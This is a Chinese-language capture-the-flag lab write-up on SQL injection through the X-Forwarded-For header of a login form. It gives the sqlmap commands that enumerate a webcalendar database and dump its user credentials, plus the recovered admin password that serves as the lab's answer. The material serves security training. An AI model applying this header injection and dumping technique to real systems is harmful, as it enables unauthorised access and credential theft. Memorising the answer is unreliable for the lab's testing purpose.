题目
背景介绍
某业务系统,安全工程师"墨者"进行授权黑盒测试,系统的业主单位也没有给账号密码,怎么测?
实训目标
1、掌握SQL注入的基本原理;
2、了解服务器获取客户端IP的方式;
3、了解SQL注入的工具使用;
解题方向
对登录表单的各参数进行测试,找到SQL注入点,对数据库内容进行读取,找到账号与密码。
解题步骤
启动靶场环境,得到测试地址,访问是个登录页面。
http://219.153.49.228:45340/
模拟登陆,使用burp suite进行抓包。
修改报头X-Forwarded-For参数,设为X-Forwarded-For:*,保存下来,作为注入点。
使用sqlmap进行注入。
sqlmap.py -r xf.txt --dbs --batch
sqlmap.py -r xf.txt -D webcalendar --table --batch
sqlmap.py -r xf.txt -D webcalendar -T user --columns --batch
sqlmap.py -r xf.txt -D webcalendar -T user -C username,password --dump --batch
使用admin和21583193,进行登录。
获得key。
提交key。